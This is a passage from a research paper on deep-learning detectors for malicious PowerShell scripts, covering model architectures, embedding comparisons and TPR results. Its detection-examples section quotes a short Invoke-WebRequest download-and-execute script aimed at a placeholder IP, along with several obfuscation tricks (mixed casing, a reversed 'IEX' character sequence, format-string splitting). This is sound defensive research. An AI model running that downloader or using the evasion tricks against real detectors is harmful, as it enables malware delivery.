In both training and prediction, we used the first 2,000 tokens from each PowerShell script, as only 3 clean scripts (and no malicious script) in our labeled dataset contain more than 2,000 tokens. Figure 7 presents the histogram of script lengths (in terms of tokens), separately per label, on a log scale. The distributions of clean and malicious scripts are similar, and both reach almost the same maximum length.

Fig. 7: Histogram of number of tokens per script (by label), y-axis uses logarithmic scale.

V-A2 Character-Level Architecture

Another model we experimented with is the one described in [14], henceforth referred to as "Char-CNN", where character-level one-hot encoding is used. It employs a 4-layer CNN architecture, containing a single convolutional layer with 128 kernels of size 62x3 and stride 1, followed by a max pooling layer of size 3 with no overlap. This is followed by two fully-connected layers, both of size 1,024 – each followed by a dropout layer with probability 0.5 – and an output layer.
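A sketch of the character-level one-hot encoding that feeds such a model (the character set below is hypothetical; the 62x3 kernel size above suggests a 62-symbol alphabet, but the exact set used in [14] is not reproduced here):

import numpy as np
import string

# Hypothetical alphabet; the one-hot dimension equals its length.
ALPHABET = string.ascii_lowercase + string.digits + "-*$_./\\:;'\"(){}[]<>=+, "
CHAR_INDEX = {c: i for i, c in enumerate(ALPHABET)}

def one_hot_encode(script_text, max_chars=1000):
    """Encode the first max_chars characters as a (max_chars, |ALPHABET|) one-hot matrix.
    Characters outside the alphabet map to the all-zero row."""
    encoded = np.zeros((max_chars, len(ALPHABET)), dtype=np.float32)
    for pos, ch in enumerate(script_text.lower()[:max_chars]):
        idx = CHAR_INDEX.get(ch)
        if idx is not None:
            encoded[pos, idx] = 1.0
    return encoded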

V-A3 Token-Character Level Architecture

The 7 models we described so far use either a character-level or a token-level representation, but not both. In order to combine both a token-level and a character-level representation, we implemented and evaluated an architecture similar to the CNN-RNN one that uses both a one-hot encoding representation of characters and a token-level embedding layer. We henceforth refer to this architecture as "Token-Char" (we thank Eran Galili from Microsoft for his help with the architecture design and technical assistance). Here, too, we experimented with the three token embedding options (inline, W2V and FastText), resulting in 3 additional DL detection models.

The use of two input representations requires applying additional adaptations to the architecture, as otherwise it would result in a model that has too many trainable parameters, thus increasing the risk of overfitting. In order to address this issue, we reduced the number of input script-tokens and script-characters to 1,000 and also reduced the number of filters used in the convolutional layer from 128 to 64. We also reduced the number of tokens participating in the embedding process by using only tokens that appear in at least 20 scripts (instead of 10); this reduced the number of embedded tokens to 47,555.

Figure 6 depicts the "Token-Char" architecture. As can be seen, it receives both a token-level and a character-level representation of the input script. After the tokens are embedded and the characters are encoded, each is input to a separate convolutional layer with 64 filters. Next, for the token-level path, we performed max pooling with a kernel of size 3 (as was done in the CNN-RNN architecture). As for the character-level path, we used global max pooling, which resulted in a single tensor of size 64 (the number of filters used in the previous convolutional layer). We added a dropout layer with probability 0.5 for regularization (not shown in Figure 6).

We now explain how we combined the paths of the token-level and the character-level inputs. Since we use global max pooling for the character convolutional layer, we had to duplicate the resulting tensor before concatenating it to the output of the token-level layer. This allows us to apply the bidirectional LSTM on an input that is based on both the token-level embedding and the character-level encoding. In each of the 332 LSTM input entries, the top 64 values represent token-level features and the bottom 64 represent character-level features. Note that, as we did not apply global max pooling to the token-level path, the token-level sequential nature of the scripts is maintained. We use a bidirectional LSTM layer with an output size of 32 and, finally, an output layer consisting of a single node. Full technical details are provided in the appendix.
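A functional-API sketch of this two-branch architecture, based on the description above (input lengths of 1,000, 64 filters and an LSTM of size 32 as stated; the kernel sizes, the placement of the dropout layer and the embedding dimension are our reading of Figure 6 and are assumptions):

from tensorflow import keras
from tensorflow.keras import layers

max_tokens = max_chars = 1_000
token_vocab = 47_555          # tokens appearing in at least 20 scripts
alphabet_size = 62            # character one-hot dimension

# Token-level branch: embedding -> convolution -> max pooling (keeps sequence order).
token_in = keras.Input(shape=(max_tokens,), name="tokens")
t = layers.Embedding(token_vocab, 32)(token_in)                 # initialized with FastText/W2V vectors
t = layers.Conv1D(64, 3, activation="relu")(t)                  # -> (998, 64)
t = layers.MaxPooling1D(pool_size=3)(t)                         # -> (332, 64)

# Character-level branch: one-hot input -> convolution -> global max pooling -> dropout.
char_in = keras.Input(shape=(max_chars, alphabet_size), name="chars")
c = layers.Conv1D(64, 3, activation="relu")(char_in)
c = layers.GlobalMaxPooling1D()(c)                              # -> (64,)
c = layers.Dropout(0.5)(c)
c = layers.RepeatVector(332)(c)                                 # duplicate to align with the 332 token steps

# Concatenate per time step (64 token features + 64 character features) and classify.
merged = layers.Concatenate(axis=-1)([t, c])                    # -> (332, 128)
x = layers.Bidirectional(layers.LSTM(32))(merged)
out = layers.Dense(1, activation="sigmoid")(x)

token_char = keras.Model([token_in, char_in], out)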

V-B Traditional NLP-based detectors

We used two types of NLP feature extraction methods: character-level n-grams and token-level n-grams, evaluating several values of n for each. We only used tokens appearing in at least 10 scripts. For both methods, we evaluated both term-frequency (tf) and term-frequency-inverse-document-frequency (tf-idf) as a weighting factor and then applied a logistic regression classifier on the extracted features (more details are provided in the appendix). For each type of features (token-based or character-based), we report on the evaluation results of the best-performing model (the optimal value of n), using tf-idf, as it gave the best results in terms of true positive rate (TPR, a.k.a. recall) when using a threshold keeping the false positive rate (FPR) lower than 0.001.
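The token-level variant of these baselines can be sketched with scikit-learn as follows (the tokenizer repeats the one from Section III; hyper-parameters and variable names such as train_scripts are illustrative assumptions):

import re
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

TOKEN_RE = re.compile(r"[A-Za-z*$\-]{2,}")

def tokenize(script_text):
    return [t.lower() for t in TOKEN_RE.findall(script_text)]

# Token 2-grams weighted by tf-idf; min_df keeps n-grams seen in at least 10 scripts,
# roughly mirroring the per-token filter described above.
baseline = make_pipeline(
    TfidfVectorizer(tokenizer=tokenize, ngram_range=(2, 2), min_df=10, lowercase=False),
    LogisticRegression(max_iter=1000),
)
# train_scripts, train_labels, test_scripts: hypothetical variables holding the labeled data.
baseline.fit(train_scripts, train_labels)
scores = baseline.predict_proba(test_scripts)[:, 1]   # maliciousness scores for thresholding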

VI Experimental Evaluation

In this section, we describe how we evaluated our detectors. We then present and discuss evaluation results. This is followed by an analysis of the contribution of contextual embedding and a discussion of the added value of the character-level representation.

We split our labeled dataset according to scripts' collection times into a test set and a train set (each containing both malicious and clean scripts); our models were trained and evaluated using cross-validation on the train set. In terms of time period, the train set includes scripts seen during May-July 2018, while the test set includes scripts seen during August-October 2018.

We performed a 3-fold cross-validation on the train set to select values for hyper-parameters such as the size of the kernel of the convolutional layer, the number of filters to use, the size of the LSTM layer, etc. Cross-validation was also used for selecting the number of training epochs, as follows: for each fold, we selected the model generated in the epoch in which we obtained the highest TPR on the validation set (with an FPR lower than 0.001). As for performance evaluation on the test set – since the above procedure generates 3 models for each detector (one per fold), we apply all three to the test set and use their average score. We used this technique, discussed in [46], in order to avoid overfitting that may result from using too many training epochs.
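The TPR-at-fixed-FPR criterion used throughout the evaluation can be computed directly from the ROC curve; a small sketch (our own helper, with hypothetical variable names in the example):

import numpy as np
from sklearn.metrics import roc_curve

def tpr_at_fpr(y_true, y_score, max_fpr=1e-3):
    """Highest TPR achievable with a decision threshold whose FPR does not exceed max_fpr."""
    fpr, tpr, _ = roc_curve(y_true, y_score)
    feasible = fpr <= max_fpr
    return float(tpr[feasible].max()) if feasible.any() else 0.0

# Example: scores of one fold's model on its validation fold (hypothetical variables).
# print(tpr_at_fpr(val_labels, val_scores))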

VI-A AUC results

For the traditional NLP models, we present the results of the models that performed the best. These are the character-level using tri-grams (Char-3-gram) and token-level using bi-grams (Token-2-gram), both using tf-idf for feature weighting. First, we focus on the area under the ROC curve (AUC) on the validation set, presented in the AUC column in Table II.

As evident from Table II, all detectors obtain very high AUC levels, above 0.98. At first glance, this may lead one to conclude that they all provide sufficiently good performance. However, considering that in real-world deployments the rate of PowerShell scripts to be classified by our models may be very high, even a low FPR of 1% would result in too many false alarms, rendering the detection system impractical. Thus, for a detector to be useful, it must maintain a very low FPR. Consequently, in what follows we evaluate the TPR of the detectors while enforcing very low FPR levels.

VI-B TPR results

Columns 'Train', 'Validation' and 'Test' in Table II present the TPR of our detectors for an FPR level of 0.001, over the train, validation and test sets. In general, when conducting cross-validation on the train set, results are reported only for the validation fold. We choose to also report on the performance of our models on the train folds (in the column with heading 'Train'), since this allows us to better analyze the extent to which different models suffer from overfitting.

As already mentioned, we conduct the analysis at an FPR level of 0.001. Since we have a total of about 28,000 clean scripts in each train set fold, using this threshold translates to at most 28 FPs in each fold.

The TPR scores presented for the train and validation sets in Table II are based on the average of the scores for the three folds. As mentioned above, for each train set fold used for validation, we select the model that provides the highest TPR (over the epochs) on this fold, while keeping the FPR low. This yields three detection models applied to each test set script, resulting in three scores. The results presented in the 'Test' column of Table II are based on the average of the scores of these three models. We use this technique to ensure that we apply the best model, as each epoch results in a different model, and after a certain number of epochs the models start to overfit.

Model AUC Train Validation Test
Token-Char-FastText 0.994 0.949 0.929 0.894
Token-Char-W2V 0.995 0.972 0.922 0.810
Token-Char 0.991 0.997 0.928 0.775
CNN-FastText 0.987 0.939 0.916 0.769
CNN-W2V 0.994 0.976 0.944 0.779
CNN 0.994 0.999 0.943 0.711
CNN-RNN-FastText 0.991 0.937 0.921 0.818
CNN-RNN-W2V 0.994 0.962 0.929 0.805
CNN-RNN 0.991 0.997 0.930 0.736
CHAR-CNN 0.993 0.958 0.936 0.799
Char-3-gram 0.993 0.893 0.867 0.667
Token-2-gram 0.994 0.894 0.898 0.643
TABLE II: Area under the ROC curve (AUC) and TPR per model, for FPR lower than 0.001. Standard deviations are less than 0.005 on the validation set, 0.01 on the train set, 0.03 on the test set and 0.003 for the AUC.

While all classifiers achieve relatively high TPR values, the performance of the traditional NLP detectors is substantially lower than that of the DL detectors. In comparison to the NLP detectors, the DL detectors improve TPR by up to 4 pp on the validation set and by up to 23 pp on the test set.

The decrease in detectors’ performance on the test set in comparison with the validation set is expected, since the train set (which includes the validation set) and the test set were collected over disjoint periods of time. Moreover, as we described in Section III-B, we deduplicated our labeled data, so that the test set contains only scripts that were not seen in the train set. This implies that our TPR results are, in fact, a lower bound on the actual TPR. This is because, in practice, many scripts that are observed in the training data are likely to also appear in new data to which the detectors are applied. Since TPR results on the training data are very high, these duplicated scripts are very likely to be classified correctly. However, because of de-duplication, such scripts do not appear in our test set. A second possible explanation to the lower performance on the test set is that the models were overfitted to the validation set during the process of hyper-parameters tuning and DL architecture selection.

Focusing on the DL models, it is noteworthy to observe the impact of the pretrained embedding layer. First, inspecting the results on the train set, the TPR of models without the pretrained embedding is above 0.99 (these are the entries in red font in the ”Train” column). These extremely high TPR values are a strong indication of overfitting. Indeed, the overfitting of models without pretrained embeddings is evident from their lower performance on the test set.

For instance, focusing on the results of the Token-Char architecture, let us compare the results of the Token-Char and the Token-Char-FastText models. On the train set, Token-Char overfits with a TPR of 0.997, while Token-Char-FastText obtains a TPR of 0.949. On the validation set, Token-Char-FastText's TPR very slightly outperforms that of Token-Char. The reduction in overfitting gained by using the pretrained embedding is established by the results on the test set, where Token-Char-FastText's TPR improves over that of Token-Char by almost 12 pp, from 0.775 to 0.894 (see the red-font entry at the top of the "Test" column in Table II). Similar results (although with smaller gaps) can be observed in the CNN-RNN architecture, where the TPR on the test set improves from 0.736 to 0.818, and in the CNN architecture, where it improves from 0.711 to 0.769. A possible explanation for these results is that a pre-trained embedding enables the model to leverage contextual relationships that are absent from the labeled dataset, thus becoming less susceptible to overfitting.

Next, we compare the results obtained when using the two types of embedding – FastText and W2V. We start our comparison with the models of the Token-Char architecture, where the differences in performance between the two embedding algorithms on the test set are more significant. On the train set, the TPR of the W2V model exceeds that of FastText by approx. 2.3 pp. As we’ve already observed, superior performance on the train set is often a sign of higher overfitting and this seems to be the case also here. Indeed, FastText takes the lead on the validation set and outperforms W2V by approx. 0.7 pp. The gap becomes much more significant on the test set, where Token-Char-FastText is the best model with a TPR of more than 0.89, exceeding the TPR of Token-Char-W2V by almost 8.5 pp.

A similar trend, although much less pronounced, is observed in the CNN and the CNN-RNN architectures. W2V's TPR is superior to that of FastText on the train set (by 3.7 pp and 2.5 pp, respectively), but the gaps are slightly decreased on the validation set (2.8 pp and 0.8 pp, respectively) and significantly decreased or even reversed on the test set (1 pp and -1.3 pp, respectively).

Collectively, these results seem to indicate that, in our setting, models employing FastText generalize better than those based on W2V. A possible explanation is that FastText is better at interpreting tokens that were not seen in the train set but appear in the validation or test sets. This is because FastText utilizes sub-tokens in the embedding process.

Summing up our analysis of TPR results, we reach the following key conclusions:

  1. The DL detection models significantly outperform the traditional NLP models.

  2. Pretrained embedding significantly improved TPR on the test set: by 11.9 pp in the Token-Char architecture, and by 8.2 and 6.8 pp in the CNN-RNN and CNN architectures, respectively.

Another, more general conclusion, is the following: in some cases, it is important to analyze the TPR on the train set and not only on the validation set alone, in order to avoid selecting an overfitted model. As evident from our evaluation, when two models reach more-or-less the same TPR on the validation set, the TPR on the train set can help us determine which model will generalize better on unseen data.

We proceed to analyze in finer resolution the manner in which contextual embedding improves detection performance.

VI-C The Contribution of Contextual Embeddings

In this section, we analyze the contribution of contextual embedding. We start by measuring the contribution to the model TPR that is gained by using non-labeled data in the contextual embedding. We then describe and analyze specific examples of malicious PowerShell tokens and code whose detection is facilitated by using the embedding.

VI-C1 Contribution of Non-Labeled Data

In Section VI, we evaluated 12 malicious-PowerShell-script detectors (see Table II), 6 of which use a pretrained embedding layer. As we saw, the pretrained embedding improves TPR significantly on all architectures. We remind the reader that the embedding layer was trained using both the train set and the unlabeled dataset. In order to quantify the contribution of the unlabeled dataset by itself to the TPR of our detection models, we generated an embedding layer using the train set only and then measured the TPR of the resulting models (while keeping the FPR below 0.001).

The results are presented in Table III. The 'Inline' column presents the TPR for the models without contextual embedding, and the 'All data' column presents it for the models with an embedding trained using both the train set and the unlabeled dataset (these values also appear in Table II and are repeated here to facilitate comparison). The 'Train set only' column presents the TPR results of the new models, trained using the train set only – without the unlabeled scripts. As can be seen by comparing the 2nd and 3rd columns of Table III, all the models except for Token-Char-FastText hardly benefit at all from the contextual embedding when it is trained using the train set only. Thus, the contribution of the contextual embedding for these 5 models should be fully attributed to the usage of the unlabeled dataset (whose contribution can be quantified by comparing the 3rd and 4th columns). The most probable explanation is that the DL model weights are optimized with respect to the train set tokens by the supervised training process anyway.

The results for the Token-Char-FastText detector are significantly different. Training the contextual embedding solely based on the train set improves TPR by approx. 4.8 pp over no contextual embedding at all, while using also scripts from the unlabeled corpus increases TPR by additional 7.1 pp. The contribution of the train set embedding in this case can probably be attributed to the character-level input representation.

Model Inline Train set only All data
Token-Char-FastText 0.775 0.823 0.894
Token-Char-W2V 0.775 0.763 0.810
CNN-FastText 0.711 0.72 0.769
CNN-W2V 0.711 0.713 0.779
CNN-RNN-FastText 0.736 0.736 0.818
CNN-RNN-W2V 0.736 0.729 0.805
TABLE III: TPR results without contextual embedding (’Inline’), with contextual embedding using train set only, and with contextual embedding using both the unlabeled dataset and the train set.

VI-C2 Detection Examples

We now provide an example of how the W2V embedding facilitates the detection of malicious code. Consider the following short malicious script:

Invoke-WebRequest -Uri http://<Ip>/ry.exe -OutFile ([System.IO.Path]::GetTempPath()+'c.exe');
powershell.exe Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'c.exe');

In the above code, Invoke-WebRequest is used to fetch the payload, write it to a temporary folder and then execute it. Recall that the PowerShell command Invoke-WebRequest has an alias – IWR. When Invoke-WebRequest is replaced by IWR in the above script, the CNN-RNN model using the inline embedding scores the altered script 5 pp lower, that is, it scores it as significantly less likely to be malicious. This decrease does not occur when the CNN-RNN-W2V model is used. We now explain the reason for this difference.

Counting token appearances in the train set, we found that the Invoke-WebRequest command appears in 1540 clean scripts and in 6 malicious scripts, while IWR appears in 27 train set scripts, all of which are clean. This explains the decrease in score of the inline embedding model.

In the model that uses the W2V embedding, on the other hand, the Invoke-WebRequest command and its alias IWR were found to be semantically equivalent, since each of the two vectors to which they were mapped by W2V is the closest neighbor of the other. Consequently, when using the CNN-RNN-W2V model, no decrease in the score is observed when replacing the command by its alias.
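The following minimal sketch (assuming a trained gensim Word2Vec model over case-folded PowerShell tokens, here called w2v) shows how such a mutual-nearest-neighbor relation can be checked; the function name is ours and is used for illustration only.

def are_mutual_nearest_neighbors(model, tok_a, tok_b):
    # each token's single nearest neighbor in the embedding space
    nn_a = model.wv.most_similar(tok_a, topn=1)[0][0]
    nn_b = model.wv.most_similar(tok_b, topn=1)[0][0]
    return nn_a == tok_b and nn_b == tok_a

# e.g., are_mutual_nearest_neighbors(w2v, 'invoke-webrequest', 'iwr')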

Next, we provide an example of how FastText facilitates detection by comparing the performance of the CNN-RNN model (which does not use a contextual embedding) with that of CNN-RNN-FastText. We prefer to conduct this comparison using the CNN-RNN architecture rather than the Token-Char architecture, since the former only utilizes per-token information, making it easier to pinpoint the contribution of the contextual embedding.

The CNN-RNN-FastText model detected 143 scripts that were not detected by the CNN-RNN model; out of these, 137 are TPs and 6 are FPs. (Conversely, 34 scripts detected by CNN-RNN with the inline embedding were not detected using the FastText embedding; out of these, 28 are TPs and 6 are FPs.) Manually analyzing these scripts, we were not able to identify any specific tokens that could have contributed to the detection. Nevertheless, our analysis of the newly-detected scripts indicates that in at least 41 of them, detection can be at least partly attributed to the fact that FastText uses sub-tokens. We now provide an example showcasing the possible contribution of sub-tokens.

Our analysis identified the following 3 tokens (henceforth referred to as the example tokens), one or more of which appear in 41 of the newly-detected scripts: 'responsetext', 'responsebody' and 'xmlhttp'. These 3 tokens seem rather benign based on the train set: they were seen in 44, 84 and 49 train set scripts, respectively, out of which only 1, 2 and 2 (respectively) were malicious. We then analyzed the properties of their sub-tokens. In addition to a significant increase in the number of train set scripts containing one or more of these sub-tokens (which is to be expected), we found that some of the sub-tokens seem suspicious based on the train set, since the ratio of malicious train set scripts in which they appear is relatively high, facilitating the detection of the scripts that contain them. Examples of such sub-tokens are:

  • ’http’ appeared in 18,616 train set scripts, 2,024 of which are malicious (10.8%).

  • ’spo’ appeared in 7,296 scripts, 656 of which are malicious (8.9%).

Since FastText utilizes sub-tokens in its embedding process, the vector representations assigned to tokens that share sub-tokens are relatively close to each other. Consequently, because the above sub-tokens appear in malicious contexts (mostly as part of tokens other than the example tokens), tokens containing them are embedded close to the example tokens, which can assist the model in correctly classifying scripts that contain the example tokens.
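As an illustration, the following sketch (assuming a trained gensim FastText model, here called ft) ranks candidate tokens by their cosine similarity to a given token; since FastText composes a token's vector from its character n-gram vectors, tokens sharing sub-tokens such as 'http' tend to rank high even when the full tokens are rare.

def rank_by_similarity(model, token, candidates):
    # sort candidate tokens by cosine similarity to the given token, most similar first
    return sorted(candidates,
                  key=lambda c: model.wv.similarity(token, c),
                  reverse=True)

# e.g., rank_by_similarity(ft, 'xmlhttp', ['responsetext', 'responsebody', 'get-date'])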

VI-D Character-Level Versus Token-Level Representations

In this section, we investigate the added value of the character-level input representation over the token-level representation and discuss the ways in which we combined the two representations.

From Table II, we see that the TPR of the CHAR-CNN model on the test set not only significantly surpasses that of the NLP-based detectors, but also exceeds that of the CNN architecture models by 2 pp or more. Its TPR is also comparable with that of the CNN-RNN architecture models and, specifically, is exceeded by the CNN-RNN-FastText model by less than 2 pp. We now analyze the differences in detection between the CHAR-CNN and the CNN-RNN-FastText models to better understand the added value of CHAR-CNN.

By comparing the detection results of these two models we found that CNN-RNN-FastText detects 60 scripts that are not detected by CHAR-CNN, 55 of which are TPs, while CHAR-CNN detects 34 scripts (29 of which are TPs) that are not detected by CNN-RNN-FastText. The significant added value of the character-level model can be explained by the existence of obfuscated scripts in our test set that are detected by it but are not detected at the token level, as we explain next.

We focus first on the CNN-RNN-FastText model and discuss how it treats various PowerShell code obfuscation techniques and why some of them are not detected by it, using concrete examples from the 29 test set scripts that are detected by CHAR-CNN but evade CNN-RNN-FastText.

As we described previously, FastText uses sub-tokens to construct a contextual embedding. This enables the model to tackle one of the known methods of PowerShell obfuscation – the use of string manipulations to construct a PowerShell command. Unfortunately, in some cases, the usage of sub-tokens by FastText is insufficient for detecting this type of obfuscation. Moreover, there are additional PowerShell obfuscation techniques that are not detectable at the token level. We identified 3 such "blind spots" of FastText (these are clearly blind spots of W2V as well, since W2V treats tokens as atomic units):

  • One popular way of PowerShell code obfuscation, seen in many malicious scripts, is the usage of tokens whose characters alternate between lower-case and upper-case (e.g., iNvOkE-wEbReQuEsT). Token-level representations are unable to detect this type of obfuscation, which was observed in 16 of the 29 scripts that evaded CNN-RNN-FastText.

  • Special characters such as '+' and '[' or ']' are treated as delimiters and are therefore absent from token-level embeddings, that is, they do not appear as part of tokens or sub-tokens. Out of the 29 missed scripts, 13 scripts contain all 3 of these special characters. Interestingly, in three of these scripts, we observed a relatively rare obfuscation technique, in which a part of the script (containing ASCII-encoded characters) appears in reverse order. An example of this obfuscation technique is the command "[88]rahc[+96]rahc[+37]rahc", which, upon reversal, becomes "IEX", an alias of the "Invoke-Expression" cmdlet. It is impossible to detect such obfuscation techniques without considering the special characters they use.

  • String manipulations using one or two characters generally evade FastText. The minimum token length is 2, hence a single character cannot contribute to a model that uses the FastText embedding. As for two-character tokens, these are likely to appear in numerous contexts, so it is reasonable to assume that their embedding does not contribute much to detection. Indeed, in 12 of the 29 missed scripts, tokens were constructed by concatenating multiple strings, many of which are single characters or 2-character strings, thus evading FastText. Here is an example of part of a command obfuscated in this manner (the Python sketch after this list shows how such fragments reassemble):
    '{2}{3}{0}{1}'-f 'Sc','RiPT','inVOk','E' 'vA' + 'rI'+'aBle:jW4v'
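The following minimal Python sketch illustrates why such fragments carry little token-level signal: reassembling the format-operator fragments from the example above (Python's str.format stands in for PowerShell's -f operator here) and decoding the character codes hidden in the reversed-ASCII example both recover meaningful PowerShell identifiers from 1- and 2-character pieces and special characters.

fragments = ['Sc', 'RiPT', 'inVOk', 'E']
print('{2}{3}{0}{1}'.format(*fragments))   # inVOkEScRiPT
print('vA' + 'rI' + 'aBle:jW4v')           # vArIaBle:jW4v
print(chr(73) + chr(69) + chr(88))         # IEX (character codes 73, 69, 88)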

Turning our attention back to the CHAR-CNN model, we note that it was established in [14] that this model is able to detect many of these obfuscation techniques, since it considers its input at the character level and takes character casing into consideration.

In the wake of the above analysis, we concluded that the character-level and token-level approaches are complementary and seem to cover different aspects of the detection problem; hence, we sought ways of combining them. Our first attempt was to construct an ensemble that combines the detection results of CNN-RNN-FastText and CHAR-CNN by averaging the scores they assign to the input script.

The ensemble increased the TPR on the test set to 0.835, which translates to at least 45 additional script detections in comparison to each of the two models by itself. Still, this is almost 6 pp lower than the TPR of the Token-Char-FastText model (which achieves a TPR of 0.894 on the test set). These results indicate that feeding the DL model with both a token-level and a character-level input representation enables it to learn features based on combinations of signals from both levels, providing more synergy between them than is possible by using each model separately and feeding their scores to an ensemble.
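For clarity, the score-averaging ensemble can be sketched as follows (assuming two trained Keras models and their respective encoded inputs; the function name is ours and is illustrative only):

def ensemble_score(model_a, model_b, inputs_a, inputs_b):
    # average the per-script maliciousness scores of the two detectors
    return (model_a.predict(inputs_a) + model_b.predict(inputs_b)) / 2.0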

VII Related Work

Several recent reports by anti-malware vendors surveyed the increasing use of PowerShell as a cybersecurity attack vector [3, 2, 4]. Hendler et al. [14] presented the first detector of malicious PowerShell code. Their detector is based on a DL model that uses a character-level representation. Whereas their detector is optimized for detecting PowerShell commands, our detector targets the detection of malicious PowerShell scripts and modules, whose syntax is much more complex. Holmes and Bohannon [47] present a detector of obfuscated PowerShell code. Although the problem of detecting obfuscated scripts is related to that of detecting malicious scripts, these are two different problems, because many malicious scripts are not obfuscated and these scripts cannot be detected using the approach of [47]. Moreover, benign PowerShell scripts may be obfuscated as well.

Recently, Rusak et al. [48] presented a classifier that assigns malicious PowerShell scripts to malware families. Their classifier is based on an Abstract Syntax Tree (AST) representation of PowerShell scripts. Their DL model uses a small-scale embedding of 62 AST node types. They report an accuracy of 85% on their validation set. Unlike our work, they do not address the problem of detecting malicious PowerShell code, nor do they use a (direct) contextual embedding of PowerShell code.

In the following, we survey additional previous works that present DL-based detectors, often in conjunction with an embedding stage, for detecting malicious scripts, PE files and URLs. Unlike our work, none of them uses unlabeled data to pre-train an embedding layer. Moreover, whereas our (best-performing) detector combines embeddings of both language-level tokens and characters, these works only use an embedding at a single representation level, mostly the character/byte level.

Raff et al. [49] addressed the problem of detecting malicious Portable Executable (PE) files using a DL model containing an embedding layer. Their classifier uses the PE header only, whose raw bytes are used as input to a DL model, containing a W2V-style embedding layer. According to their evaluation, their detector obtained similar results to those of using one-hot encoding, which can be expected given the fact that their embedding is conducted on character-level input. Athiwaratkun and Stokes [50] addressed the same problem using dynamic analysis of PE files, emulating file execution and recording the sequence of system-calls executed by the program. This generated a set of 114 unique high-level system-calls. These sequences were used as input to several DL models, one of which included an embedding layer which treated each system-call in the sequence as a token.

Saxe and Berlin [51] use a character-level embedding in conjunction with a CNN architecture for detecting malicious URLs, file paths and registry values. They use several filter sizes in order to mimic n-gram features. In recent work, Yang et al. [52] propose a DL-based approach for detecting malicious URLs. In their work, they use a character-level embedding but also explicitly consider 95 specific suspicious tokens for fine-tuning this embedding.

Stokes et al. [53] present a DL-based detector of malicious JavaScript and VisualBasicScript code. They use the byte representation of the script as model input. They experimented with two architectures, one using a byte-level embedding, which is more effective for analyzing relatively short code sequences, and another that processes the input in longer units of fixed length before feeding it to the embedding layer. In both cases, the embedding was learned as part of the supervised training. Wang et al. [54] present a malicious JavaScript code detector. Their detector converts JavaScript code to binary vectors (according to character ASCII values), which are then fed to the DL architecture; no embedding technique is used.

In the rest of this section, we briefly describe two novel contextual word embedding schemes with which we did not experiment. Devlin et al. present BERT, which applies the bidirectional training of the Transformer [55] to language modeling. They present and use a novel masked language model technique for conducting bidirectional training. Unlike FastText and W2V, BERT uses multiple hidden layers.

Peters et al. present ELMo [56], an embedding technique that constructs several vector representations for each token, one per every context in which it appears. For instance, the word ’pool’ has different meanings in the context of ’swimming pool’ and ’playing pool’. ELMo uses two bidirectional LSTM layers on top of a character-level convolution layer.

In this work, we chose to use W2V and FastText in order to investigate the contribution of using a pre-trained embedding for the detection of malicious PowerShell scripts. We preferred these algorithms over BERT given the relatively small dataset, and over ELMo, since the latter is optimized for settings in which many tokens have different meanings in different contexts, which is not the case in the PowerShell “language”.

VIII Conclusions and Future Work

In this work, we addressed the problem of detecting malicious PowerShell scripts. We presented and evaluated several novel DL-based detectors that leverage a pre-trained contextual embedding of tokens from the PowerShell “language”. A unique feature of these detectors is that their embedding is trained using a dataset enriched by a large corpus of unlabeled PowerShell scripts. Our performance analysis establishes that the usage of unlabeled data significantly increased detection accuracy. A promising avenue for future work is to investigate whether this technique can find additional cybersecurity applications. As a first step, we plan to implement, using this approach, detectors for additional scripting languages. Another related interesting question is how best to strike a balance between the sizes of the unlabeled dataset used for embedding and the labeled dataset used for supervised training.

Our best model combines an embedding of language-level tokens with one-hot encoding of characters. Feeding the DL model with both a token-level and a character-level input representation enables it to learn features based on combinations of signals from both levels, thereby obtaining a TPR of nearly 90% while maintaining a low FPR of less than 0.1%, making us hopeful that this model can be of practical value.

In future work, we plan to investigate alternative ways of combining features based on both token-level and character-level input representations.

References

IX Appendix - Implementation Details

We implemented our DL models using Keras (https://keras.io/). For the DL models, we used binary cross-entropy as the loss function with the Adam optimizer, and a tolerance of . Data was processed in mini-batches of size 512 with a maximum of 30 epochs. Sample weights were set in proportion to the class ratio.
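A minimal sketch of this training configuration, assuming an already-constructed Keras model and pre-processed training data (the variable names are placeholders):

def train_detector(model, x_train, y_train, class_weight):
    # binary cross-entropy loss with the Adam optimizer
    model.compile(loss='binary_crossentropy', optimizer='adam')
    # mini-batches of size 512, at most 30 epochs, class weights proportional to the class ratio
    model.fit(x_train, y_train, batch_size=512, epochs=30, class_weight=class_weight)
    return model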

As for traditional ML, we used SGD with log loss and an L2 penalty. We stopped after 100 iterations, or when the change in loss was smaller than .
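A minimal scikit-learn sketch of this setup (the stopping tolerance is left at its default here):

from sklearn.linear_model import SGDClassifier

# SGD with log loss (named 'log_loss' in newer scikit-learn versions) and an L2 penalty,
# stopping after at most 100 iterations
clf = SGDClassifier(loss='log', penalty='l2', max_iter=100)
# clf.fit(X_train_features, y_train)   # hypothetical feature matrix and labels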

IX-A CNN

On top of the embedding layer, we used a convolutional layer with 128 filters and a kernel size of 3 (i.e., 3 tokens are processed at a time). A global max-pooling layer was used to reduce dimensionality, followed by a dropout layer and a dense layer with a sigmoid activation function.
from keras.models import Sequential
from keras.layers import Embedding, Conv1D, GlobalMaxPooling1D, Dropout, Dense

model = Sequential()
# vocab_size is a placeholder for the size of the PowerShell token vocabulary;
# the embedding dimension is 32 (see Section IX-D)
model.add(Embedding(input_dim=vocab_size, output_dim=32))
model.add(Conv1D(128,
                 kernel_size=3,
                 padding='valid',
                 activation='relu',
                 strides=1))
model.add(GlobalMaxPooling1D())
model.add(Dropout(0.5))
model.add(Dense(1, activation='sigmoid'))

IX-B CNN-RNN

We used an LSTM layer on top of a convolutional layer. The convolutional layer has 128 filters and a kernel size of 3 (i.e., 3 tokens are processed at a time). A max-pooling layer with a pool and stride size of 3 is used to reduce dimensionality, followed by a bi-directional LSTM layer with an output of size 32 and a dense layer with a sigmoid activation function as our output.
from keras.models import Sequential
from keras.layers import (Embedding, Conv1D, MaxPooling1D,
                          Bidirectional, LSTM, Dense)

model = Sequential()
# vocab_size is a placeholder for the size of the PowerShell token vocabulary;
# the embedding dimension is 32 (see Section IX-D)
model.add(Embedding(input_dim=vocab_size, output_dim=32))
model.add(Conv1D(128,
                 kernel_size=3,
                 padding='valid',
                 activation='relu',
                 strides=1))
model.add(MaxPooling1D(pool_size=3, strides=3))
model.add(Bidirectional(LSTM(32, dropout=0.5, recurrent_dropout=0.02)))
model.add(Dense(1, activation='sigmoid'))

IX-C Token-Char

